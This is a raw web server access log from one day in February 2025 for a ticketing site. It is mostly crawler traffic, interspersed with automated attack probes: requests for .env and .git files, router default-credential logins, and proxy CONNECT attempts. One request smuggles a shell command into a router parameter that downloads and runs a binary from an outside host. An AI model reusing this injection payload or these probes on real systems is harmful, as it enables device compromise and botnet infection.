46.19.138.210 - - [13/Feb/2025:00:03:21 +0100] "GET /ticket2/opencms/.git/config HTTP/1.1" 404 -
176.65.141.204 - - [13/Feb/2025:00:17:08 +0100] "GET /ticket2/opencms/.env HTTP/1.1" 404 -
176.65.141.204 - - [13/Feb/2025:00:17:10 +0100] "POST /ticket2/opencms/ HTTP/1.1" 302 -
185.242.226.109 - - [13/Feb/2025:00:28:00 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
185.242.226.109 - - [13/Feb/2025:00:28:00 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
185.242.226.109 - - [13/Feb/2025:00:28:00 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
51.8.102.22 - - [13/Feb/2025:00:31:06 +0100] "GET /ticket2/opencms/robots.txt HTTP/1.1" 304 -
106.75.169.149 - - [13/Feb/2025:00:31:35 +0100] "GET /ticket2/opencms/FIyT HTTP/1.1" 404 -
106.75.169.149 - - [13/Feb/2025:00:31:36 +0100] "GET /ticket2/opencms/RLVi HTTP/1.1" 404 -
172.169.2.104 - - [13/Feb/2025:00:41:40 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
114.119.141.178 - - [13/Feb/2025:00:44:46 +0100] "GET /ticket2/opencms/en/venue/?venueid=644AC771-2186-260E-75E7-7F6B39C5B86B HTTP/1.1" 200 63658
114.119.130.154 - - [13/Feb/2025:01:13:05 +0100] "GET /ticket2/opencms/en/sell/ HTTP/1.1" 302 -
114.119.130.154 - - [13/Feb/2025:01:13:09 +0100] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 65723
198.235.24.229 - - [13/Feb/2025:01:14:44 +0100] "GET / HTTP/1.1" 404 -
114.119.143.233 - - [13/Feb/2025:01:29:44 +0100] "GET /ticket2/opencms/en/venue/?venueid=30E59E70-2AD5-DB3F-8F99-0F76DBFE059E HTTP/1.1" 200 63645
112.248.185.161 - - [13/Feb/2025:01:32:00 +0100] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 -
159.65.117.144 - - [13/Feb/2025:02:06:21 +0100] "GET /ticket2/opencms/.env HTTP/1.1" 404 -
167.94.138.197 - - [13/Feb/2025:02:08:55 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
167.94.138.197 - - [13/Feb/2025:02:10:23 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
167.94.138.197 - - [13/Feb/2025:02:10:29 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
10.140.0.92 - - [13/Feb/2025:02:23:10 +0100] "GET / HTTP/1.1" 404 -
66.249.66.160 - - [13/Feb/2025:02:29:26 +0100] "GET /ticket2/opencms/en/venue/?countryid=55B682DB-9731-DD7B-33FA-C9B465971014 HTTP/1.1" 200 93013
45.144.212.139 - - [13/Feb/2025:02:37:58 +0100] "GET /ticket2/opencms/.env HTTP/1.1" 404 -
87.120.115.76 - - [13/Feb/2025:03:39:11 +0100] "GET /ticket2/opencms/.env HTTP/1.1" 404 -
87.120.115.76 - - [13/Feb/2025:03:39:50 +0100] "GET /ticket2/opencms/.env HTTP/1.1" 404 -
31.13.224.222 - - [13/Feb/2025:04:15:10 +0100] "GET /ticket2/opencms/.env HTTP/1.1" 404 -
66.249.66.161 - - [13/Feb/2025:04:16:37 +0100] "GET /ticket2/opencms/en/venue/?countryid=9E2F78CF-6136-5571-6F34-DBB927119F5E HTTP/1.1" 200 93013
207.46.13.231 - - [13/Feb/2025:04:39:47 +0100] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
207.46.13.231 - - [13/Feb/2025:04:39:47 +0100] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
40.77.167.3 - - [13/Feb/2025:04:39:58 +0100] "GET /ticket2/opencms/en/venue/?venueid=4BC8A4F7-B275-C48F-5201-9432C06891B2 HTTP/1.1" 200 63645
184.105.139.121 - - [01/Jan/1970:00:59:59 +0100] "-" 400 -
141.255.166.90 - - [13/Feb/2025:04:57:53 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 -
52.167.144.175 - - [13/Feb/2025:05:15:20 +0100] "GET /ticket2/opencms/en/venue/?venueid=93DAAAF3-1B74-84EC-84B9-59E298EE51A3 HTTP/1.1" 200 63634
193.68.89.51 - - [13/Feb/2025:05:34:36 +0100] "GET / HTTP/1.1" 404 -
141.255.166.90 - - [13/Feb/2025:05:40:25 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 -
66.249.66.160 - - [13/Feb/2025:05:47:38 +0100] "GET /ticket2/opencms/en/venue/?countryid=4F2F2232-9A95-D0E1-F5ED-FFF77C15BB0E HTTP/1.1" 200 107855
141.255.166.90 - - [13/Feb/2025:06:05:21 +0100] "GET /ticket2/opencms/cgi-bin/luci/;stok=/locale HTTP/1.1" 404 -
66.249.66.160 - - [13/Feb/2025:06:12:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=CEA98181-AF32-4AD7-7F85-B2BF5D143D52 HTTP/1.1" 200 93013
45.148.10.90 - - [13/Feb/2025:06:17:51 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
141.255.166.90 - - [13/Feb/2025:06:18:28 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 -
193.68.89.51 - - [13/Feb/2025:06:29:02 +0100] "GET / HTTP/1.1" 404 -
78.108.177.50 - - [13/Feb/2025:06:49:57 +0100] "GET / HTTP/1.0" 404 -
141.255.166.90 - - [13/Feb/2025:06:59:41 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 -
52.167.144.157 - - [13/Feb/2025:07:02:33 +0100] "GET /ticket2/opencms/en/venue/?countryid=FA6155EB-FA45-A94F-2ADE-86C62589DA1C HTTP/1.1" 200 93013
193.68.89.51 - - [13/Feb/2025:07:13:07 +0100] "GET / HTTP/1.1" 404 -
138.68.54.198 - - [13/Feb/2025:07:16:08 +0100] "GET /ticket2/opencms/.env HTTP/1.1" 404 -
114.119.136.30 - - [13/Feb/2025:07:21:06 +0100] "GET /ticket2/opencms/en/venue/?venueid=EC472EA6-DB5A-9847-3498-3E97CC377FD4 HTTP/1.1" 200 63627
141.255.166.90 - - [13/Feb/2025:07:43:30 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 -
80.66.83.48 - - [13/Feb/2025:07:58:54 +0100] "CONNECT smtp.mail.yahoo.com:25 HTTP/1.1" 400 -
193.68.89.51 - - [13/Feb/2025:08:13:00 +0100] "GET / HTTP/1.1" 404 -
141.255.166.90 - - [13/Feb/2025:08:21:26 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 -
46.19.143.26 - - [13/Feb/2025:08:24:24 +0100] "GET / HTTP/1.1" 404 -
46.19.143.26 - - [13/Feb/2025:08:24:25 +0100] "GET /logon.htm HTTP/1.1" 404 -
172.96.11.233 - - [13/Feb/2025:08:28:26 +0100] "GET /ticket2/opencms/channel/get HTTP/1.1" 404 -
66.249.66.160 - - [13/Feb/2025:08:30:47 +0100] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
66.249.66.162 - - [13/Feb/2025:08:30:49 +0100] "GET /ticket2/opencms/en/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4 HTTP/1.1" 200 73810
159.223.235.36 - - [13/Feb/2025:08:42:37 +0100] "GET /ticket2/opencms/ab2g HTTP/1.1" 404 -
159.223.235.36 - - [13/Feb/2025:08:42:38 +0100] "GET /ticket2/opencms/ab2h HTTP/1.1" 404 -
159.223.235.36 - - [13/Feb/2025:08:42:38 +0100] "GET /ticket2/opencms/alive.php HTTP/1.1" 404 -
159.223.235.36 - - [13/Feb/2025:08:42:40 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
159.223.235.36 - - [13/Feb/2025:08:42:40 +0100] "GET /ticket2/opencms/t4 HTTP/1.1" 404 -
159.223.235.36 - - [13/Feb/2025:08:42:40 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
159.223.235.36 - - [13/Feb/2025:08:42:41 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
159.223.235.36 - - [13/Feb/2025:08:42:41 +0100] "GET /ticket2/opencms/teorema505?t=1 HTTP/1.1" 404 -
144.172.97.186 - - [13/Feb/2025:08:56:47 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+tmips%3B+wget+http%3A%2F%2Fbanthis.su%2Ftmips%3B+chmod+777+tmips%3B+.%2Ftmips+dvr%3B+rm+-rf+tmips%60) HTTP/1.1" 404 -
193.68.89.51 - - [13/Feb/2025:09:04:11 +0100] "GET / HTTP/1.1" 404 -
170.64.154.53 - - [13/Feb/2025:09:07:28 +0100] "GET /aaa9 HTTP/1.1" 404 -
170.64.154.53 - - [13/Feb/2025:09:07:44 +0100] "GET /aab8 HTTP/1.1" 404 -
170.64.154.53 - - [13/Feb/2025:09:08:01 +0100] "GET / HTTP/1.1" 404 -
141.255.166.90 - - [13/Feb/2025:09:10:01 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 -
104.222.46.70 - - [13/Feb/2025:09:31:24 +0100] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
104.222.46.70 - - [13/Feb/2025:09:31:25 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
172.121.221.240 - - [13/Feb/2025:09:31:35 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
172.121.221.240 - - [13/Feb/2025:09:31:36 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
172.121.221.240 - - [13/Feb/2025:09:31:36 +0100] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
172.121.221.240 - - [13/Feb/2025:09:31:37 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
172.121.221.240 - - [13/Feb/2025:09:31:38 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
40.77.167.21 - - [13/Feb/2025:09:44:18 +0100] "GET /ticket2/opencms/en/venue/?countryid=13702050-2F05-4DBF-E863-0547221CB311 HTTP/1.1" 200 93013
141.255.166.90 - - [13/Feb/2025:09:57:21 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 -
193.68.89.51 - - [13/Feb/2025:10:03:44 +0100] "GET / HTTP/1.1" 404 -
172.96.11.233 - - [13/Feb/2025:10:06:28 +0100] "GET /ticket2/opencms/login HTTP/1.1" 404 -
114.119.153.152 - - [13/Feb/2025:10:07:32 +0100] "GET /ticket2/opencms/en/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=8AA488FA-6797-D710-8108-3088D6948FC1 HTTP/1.1" 200 73798
80.66.83.48 - - [13/Feb/2025:10:28:11 +0100] "CONNECT 185.25.48.104:80 HTTP/1.1" 400 -
66.249.66.160 - - [13/Feb/2025:10:28:37 +0100] "GET /ticket2/opencms/en/venue/?countryid=8FA673E2-F13B-75C4-56CD-A4B786B7BC94 HTTP/1.1" 200 93013
141.255.166.90 - - [13/Feb/2025:10:33:41 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 -
46.19.143.26 - - [13/Feb/2025:10:34:41 +0100] "GET / HTTP/1.1" 404 -
46.19.143.26 - - [13/Feb/2025:10:34:41 +0100] "GET /logon.htm HTTP/1.1" 404 -
66.249.66.162 - - [13/Feb/2025:10:49:16 +0100] "GET /ticket2/opencms/sv/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=06324577-7173-BAB0-146D-E644C912F7C1 HTTP/1.1" 200 75247
114.119.143.233 - - [13/Feb/2025:10:49:26 +0100] "GET /ticket2/opencms/en/venue/?venueid=11F3A3F2-5F7A-8DF0-9A91-D0D485D2E890 HTTP/1.1" 200 63639
43.155.136.16 - - [13/Feb/2025:10:52:02 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
43.155.136.16 - - [13/Feb/2025:10:52:05 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
193.68.89.51 - - [13/Feb/2025:10:59:00 +0100] "GET / HTTP/1.1" 404 -
185.242.226.109 - - [13/Feb/2025:11:01:52 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
185.242.226.109 - - [13/Feb/2025:11:01:53 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
52.167.144.206 - - [13/Feb/2025:11:11:08 +0100] "GET /ticket2/opencms/sv/buy/?page=1&edid=54777665-C11F-0F11-581A-52B69510C3F1 HTTP/1.1" 200 81255
172.96.11.233 - - [13/Feb/2025:11:20:59 +0100] "GET /ticket2/opencms/login HTTP/1.1" 404 -
141.255.166.90 - - [13/Feb/2025:11:22:08 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 -
88.147.103.182 - - [13/Feb/2025:11:38:45 +0100] "GET / HTTP/1.0" 404 -
185.242.226.109 - - [13/Feb/2025:11:42:30 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
185.242.226.109 - - [13/Feb/2025:11:42:30 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
185.242.226.109 - - [13/Feb/2025:11:42:31 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
92.255.57.58 - - [13/Feb/2025:11:47:29 +0100] "GET /ticket2/opencms/?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 -
92.255.57.58 - - [13/Feb/2025:11:47:32 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
193.68.89.51 - - [13/Feb/2025:11:48:11 +0100] "GET / HTTP/1.1" 404 -
46.19.138.210 - - [13/Feb/2025:12:00:13 +0100] "GET /ticket2/opencms/_profiler/phpinfo HTTP/1.1" 404 -
66.249.66.160 - - [13/Feb/2025:12:07:11 +0100] "GET /ticket2/opencms/en/venue/?countryid=FEF54986-84B0-FEDA-0583-5080DFD917BA HTTP/1.1" 200 93013
66.249.66.161 - - [13/Feb/2025:12:07:22 +0100] "GET /ticket2/opencms/en/venue/?countryid=7EB583F0-D67D-8877-88CD-3F7B9DDEB361 HTTP/1.1" 200 93672
35.203.210.242 - - [13/Feb/2025:12:08:29 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
35.203.210.242 - - [13/Feb/2025:12:08:30 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
66.249.66.161 - - [13/Feb/2025:12:08:39 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
66.249.66.160 - - [13/Feb/2025:12:12:26 +0100] "GET /ticket2/opencms/sv/ HTTP/1.1" 200 68095
66.249.66.160 - - [13/Feb/2025:12:12:29 +0100] "GET /ticket2/opencms/en/venue/?countryid=B33351B8-DB63-1834-566A-CB44E5291395 HTTP/1.1" 200 93013
66.249.66.160 - - [13/Feb/2025:12:12:30 +0100] "GET /ticket2/opencms/en/search.html?searchQuery=liverpool&submit= HTTP/1.1" 200 85794
66.249.66.162 - - [13/Feb/2025:12:16:28 +0100] "GET /ticket2/opencms/en/venue/?venueid=10215421-D49E-AFEB-54BC-61D044D84B88 HTTP/1.1" 200 63613
45.120.177.190 - - [13/Feb/2025:12:16:47 +0100] "CONNECT atracon.es:443 HTTP/1.1" 400 -
66.249.66.162 - - [13/Feb/2025:12:20:17 +0100] "GET /ticket2/opencms/en/search.html?searchQuery=chelsea&submit= HTTP/1.1" 200 87360
66.249.66.161 - - [13/Feb/2025:12:22:29 +0100] "GET /ticket2/opencms/en/venue/ HTTP/1.1" 200 332826
66.249.66.161 - - [13/Feb/2025:12:22:37 +0100] "GET /ticket2/opencms/en/search.html?searchQuery=tottenham&submit= HTTP/1.1" 200 86415
66.249.66.160 - - [13/Feb/2025:12:23:06 +0100] "GET /ticket2/opencms/en/search.html?searchQuery=barcelona&submit= HTTP/1.1" 200 84990
66.249.66.161 - - [13/Feb/2025:12:24:20 +0100] "GET /ticket2/opencms/en/affiliateprogram.html HTTP/1.1" 200 63934
66.249.66.160 - - [13/Feb/2025:12:25:16 +0100] "GET /ticket2/opencms/sv/affiliateprogram.html HTTP/1.1" 200 65553
91.92.109.69 - - [13/Feb/2025:12:27:09 +0100] "CONNECT www.google.com:443 HTTP/1.1" 400 -
91.92.109.69 - - [13/Feb/2025:12:27:09 +0100] "CONNECT www.amazon.com:443 HTTP/1.1" 400 -
185.247.137.123 - - [13/Feb/2025:12:28:17 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
185.247.137.123 - - [13/Feb/2025:12:28:18 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
87.236.176.241 - - [13/Feb/2025:12:28:18 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
66.249.66.160 - - [13/Feb/2025:12:28:18 +0100] "GET /ticket2/opencms/sv/buy/ HTTP/1.1" 200 65243
66.249.66.161 - - [13/Feb/2025:12:29:29 +0100] "GET /ticket2/opencms/en/venue/?countryid=E6D1D9A5-7003-75BD-6D2C-CB60A7D92969 HTTP/1.1" 200 93013
66.249.66.161 - - [13/Feb/2025:12:29:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=DDBEC1A9-923C-6F8A-904B-EA3F8C6D99F4 HTTP/1.1" 200 93013
66.249.66.162 - - [13/Feb/2025:12:30:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=BFE57D5D-96E9-5760-3742-A1CEB6924397 HTTP/1.1" 200 93013
66.249.66.161 - - [13/Feb/2025:12:30:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=C8ABE51D-DDC3-D19F-A0F7-AA8797A5EB51 HTTP/1.1" 200 93013
66.249.66.160 - - [13/Feb/2025:12:32:18 +0100] "GET /ticket2/opencms/en/venue/?countryid=7EE0FE36-9C17-F539-5F8E-1F2CFF8A0D7B HTTP/1.1" 200 93013
193.68.89.51 - - [13/Feb/2025:12:37:49 +0100] "GET / HTTP/1.1" 404 -
66.249.66.161 - - [13/Feb/2025:12:42:32 +0100] "GET /ticket2/opencms/en/venue/?countryid=6B694798-0B8F-37B1-435B-6B5A0DB8B5CB HTTP/1.1" 200 93013
66.249.66.160 - - [13/Feb/2025:12:45:07 +0100] "GET /ticket2/opencms/en/venue/?countryid=FFFF1061-F0B1-C4E6-4E92-B35C1210D71D HTTP/1.1" 200 93013
172.168.40.198 - - [13/Feb/2025:12:46:06 +0100] "GET /ticket2/opencms/version HTTP/1.1" 404 -
92.255.57.58 - - [13/Feb/2025:12:47:00 +0100] "GET /ticket2/opencms/actuator/gateway/routes HTTP/1.1" 404 -
66.249.66.162 - - [13/Feb/2025:12:49:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=65D2945E-1431-C523-469E-55D7D9B9867C HTTP/1.1" 200 93013
66.249.66.160 - - [13/Feb/2025:12:51:44 +0100] "GET /ticket2/opencms/en/venue/?countryid=EC060DB8-FED8-7431-5B9F-CF7C54F51223 HTTP/1.1" 200 100532
66.249.66.162 - - [13/Feb/2025:12:52:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=B54C3B27-273E-C131-E997-905F5C2CDDC3 HTTP/1.1" 200 93013
66.249.66.162 - - [13/Feb/2025:12:56:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=6A314B5B-08FE-5CDE-C85D-253064810CDA HTTP/1.1" 200 93013
66.249.66.162 - - [13/Feb/2025:12:58:29 +0100] "GET /ticket2/opencms/en/venue/?countryid=3F9833FD-26F3-F144-E677-9F4203CED4E3 HTTP/1.1" 200 93013
66.249.66.160 - - [13/Feb/2025:12:58:34 +0100] "GET /ticket2/opencms/en/venue/?countryid=281637B5-EBD8-5B84-5601-31AFF5C65765 HTTP/1.1" 200 93013
66.249.66.160 - - [13/Feb/2025:12:59:08 +0100] "GET /ticket2/opencms/en/venue/?countryid=20EFB686-B272-8573-F37B-891928190471 HTTP/1.1" 200 93013
176.65.128.61 - - [13/Feb/2025:12:59:42 +0100] "GET / HTTP/1.1" 404 -
64.62.156.79 - - [13/Feb/2025:13:02:02 +0100] "GET / HTTP/1.1" 404 -
64.62.156.73 - - [13/Feb/2025:13:02:38 +0100] "GET /favicon.ico HTTP/1.1" 404 -
64.62.156.70 - - [13/Feb/2025:13:02:57 +0100] "GET /?format=json HTTP/1.1" 404 -
64.62.156.70 - - [13/Feb/2025:13:03:09 +0100] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 -
64.62.156.75 - - [13/Feb/2025:13:03:23 +0100] "GET /geoserver/web/ HTTP/1.1" 404 -
66.249.66.162 - - [13/Feb/2025:13:03:24 +0100] "GET /ticket2/opencms/en/venue/?countryid=7D25928D-FFE7-0BD0-CD2F-98EEEB4D8A53 HTTP/1.1" 200 93013
66.249.66.162 - - [13/Feb/2025:13:04:19 +0100] "GET /ticket2/opencms/en/venue/?countryid=D3DB55BA-ABAE-0702-A973-202744AB3BB9 HTTP/1.1" 200 93013
45.228.5.202 - - [13/Feb/2025:13:04:33 +0100] "GET / HTTP/1.1" 404 -
66.249.66.161 - - [13/Feb/2025:13:04:43 +0100] "GET /ticket2/opencms/en/venue/?countryid=E7631FE5-7061-8322-868B-F6085CDA8809 HTTP/1.1" 200 93013
66.249.66.160 - - [13/Feb/2025:13:05:07 +0100] "GET /ticket2/opencms/en/venue/?countryid=B756B65C-E014-24B5-95EC-187A417913E3 HTTP/1.1" 200 93013
66.249.66.162 - - [13/Feb/2025:13:06:08 +0100] "GET /ticket2/opencms/en/venue/?countryid=99B1C0F6-84FB-98CC-65FC-5142D0D877AC HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:13:08:06 +0100] "GET /ticket2/opencms/en/venue/?countryid=BFE57D5D-96E9-5760-3742-A1CEB6924397 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:13:12:37 +0100] "GET /ticket2/opencms/en/venue/?countryid=C8ABE51D-DDC3-D19F-A0F7-AA8797A5EB51 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:13:13:45 +0100] "GET /ticket2/opencms/en/venue/?countryid=7EE0FE36-9C17-F539-5F8E-1F2CFF8A0D7B HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:13:19:29 +0100] "GET /ticket2/opencms/en/venue/?countryid=AD4C6C1F-4EA2-1827-F34A-F0A47DB58003 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:13:20:18 +0100] "GET /ticket2/opencms/en/venue/?countryid=B05AF8CC-D1BF-73AB-E946-B6702610D2C6 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:13:20:29 +0100] "GET /ticket2/opencms/en/venue/?countryid=62204D9B-992F-EFF6-482A-943BBD9879C3 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:13:21:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=CEA98181-AF32-4AD7-7F85-B2BF5D143D52 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:13:22:37 +0100] "GET /ticket2/opencms/en/venue/?countryid=EF4CD3F8-F552-B03A-F63B-5D01B436E59A HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:13:23:17 +0100] "GET /ticket2/opencms/en/venue/?countryid=E83385F7-FB78-F065-4683-FDC212CE9BC4 HTTP/1.1" 200 93013
51.138.188.120 - - [13/Feb/2025:13:23:20 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
51.138.188.120 - - [13/Feb/2025:13:23:20 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
66.249.74.6 - - [13/Feb/2025:13:25:42 +0100] "GET /ticket2/opencms/en/venue/?countryid=3E153AD4-B966-FBA9-55D2-B5BF8B4DBAEE HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:13:25:47 +0100] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/bundesliga/stuttgart/ HTTP/1.1" 200 70190
66.249.74.7 - - [13/Feb/2025:13:26:25 +0100] "GET /ticket2/opencms/en/venue/?countryid=ACAFFD14-DCE8-EFC6-6ECA-AF006BA900C4 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:13:26:40 +0100] "GET /ticket2/opencms/en/venue/?countryid=E5A463DD-D0D6-2F66-230F-35633A8D9ED0 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:13:27:38 +0100] "GET /ticket2/opencms/en/venue/?countryid=A41A8692-50A8-E04F-AB0B-A9766CB2286D HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:13:28:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=2E49BBE4-C681-08D6-D216-0893A1269431 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:13:28:29 +0100] "GET /ticket2/opencms/en/venue/?countryid=65CBF22C-E953-E822-8DA0-6226C52D7D6A HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:13:28:35 +0100] "GET /ticket2/opencms/en/venue/?countryid=298905FA-E037-07AD-4909-74C6371F3F35 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:13:31:07 +0100] "GET /ticket2/opencms/en/venue/?countryid=DB82417F-35E8-BF3C-287A-21ECAFBB9DD1 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:13:31:37 +0100] "GET /ticket2/opencms/en/venue/?countryid=F6743C3E-06B9-E773-142B-1B90866C1373 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:13:31:41 +0100] "GET /ticket2/opencms/en/venue/?countryid=2EB4A8F2-7936-B060-2C7F-BD402D9491FB HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:13:31:43 +0100] "GET /ticket2/opencms/en/venue/?countryid=F889867A-CECB-DD27-726E-95554BB6B831 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:13:33:08 +0100] "GET /ticket2/opencms/en/venue/?countryid=59446ECA-F11A-1164-7278-5F00083EF337 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:13:33:34 +0100] "GET /ticket2/opencms/en/venue/?countryid=C20C79E6-EE6B-26D5-6506-E0F6BF6B710A HTTP/1.1" 200 94418
66.249.74.6 - - [13/Feb/2025:13:33:41 +0100] "GET /ticket2/opencms/en/venue/ HTTP/1.1" 200 332826
66.249.74.8 - - [13/Feb/2025:13:34:29 +0100] "GET /ticket2/opencms/en/venue/?countryid=3255DA3D-476B-211A-8F09-81C55CABEF03 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:13:36:07 +0100] "GET /ticket2/opencms/en/venue/?countryid=C7880A4A-050D-8AB8-4FEC-8062D983D070 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:13:37:07 +0100] "GET /ticket2/opencms/en/venue/?countryid=EF3F1C0A-ABF4-7226-18E0-4339A3934525 HTTP/1.1" 200 93013
193.68.89.51 - - [13/Feb/2025:13:37:55 +0100] "GET / HTTP/1.1" 404 -
172.93.107.98 - - [13/Feb/2025:13:38:23 +0100] "CONNECT ip-api.com:443 HTTP/1.1" 400 -
66.249.74.7 - - [13/Feb/2025:13:39:45 +0100] "GET /ticket2/opencms/en/venue/?countryid=FA6155EB-FA45-A94F-2ADE-86C62589DA1C HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:13:40:27 +0100] "GET /ticket2/opencms/en/venue/?countryid=ABC76395-F87D-C1C2-D371-A569066C3F43 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:13:41:35 +0100] "GET /ticket2/opencms/en/venue/?countryid=4EEBA21C-1425-8784-6DA1-449CA0D3E5D8 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:13:42:06 +0100] "GET /ticket2/opencms/en/sell/ HTTP/1.1" 302 -
66.249.74.6 - - [13/Feb/2025:13:42:08 +0100] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 65723
66.249.74.6 - - [13/Feb/2025:13:45:17 +0100] "GET /ticket2/opencms/en/venue/?countryid=6F3B2F32-4F0D-5515-B82B-E3D86CD1E73F HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:13:45:44 +0100] "GET /ticket2/opencms/en/venue/?countryid=01966824-53B3-F640-5B46-BD1F79FADDA9 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:13:45:46 +0100] "GET /ticket2/opencms/en/venue/?countryid=19657A1A-D641-70BC-9F36-F54EFCC4AC04 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:13:46:19 +0100] "GET /ticket2/opencms/en/venue/?countryid=A6670E01-CE49-A608-C597-250C3D48D088 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:13:46:41 +0100] "GET /ticket2/opencms/en/venue/?countryid=44E342A3-ABB4-8C4C-D9AB-B83FB043D424 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:13:48:18 +0100] "GET /ticket2/opencms/en/venue/?countryid=F444CA42-FE5C-C76F-1CFD-E45E1073B063 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:13:48:32 +0100] "GET /ticket2/opencms/en/venue/?countryid=BCA33F4B-7509-BC45-DAD2-4CA6BF14FC82 HTTP/1.1" 200 94141
66.249.74.7 - - [13/Feb/2025:13:49:42 +0100] "GET /ticket2/opencms/en/venue/?countryid=D12DC4A4-98E1-D0B7-783E-AE51CC52E5AE HTTP/1.1" 200 93013
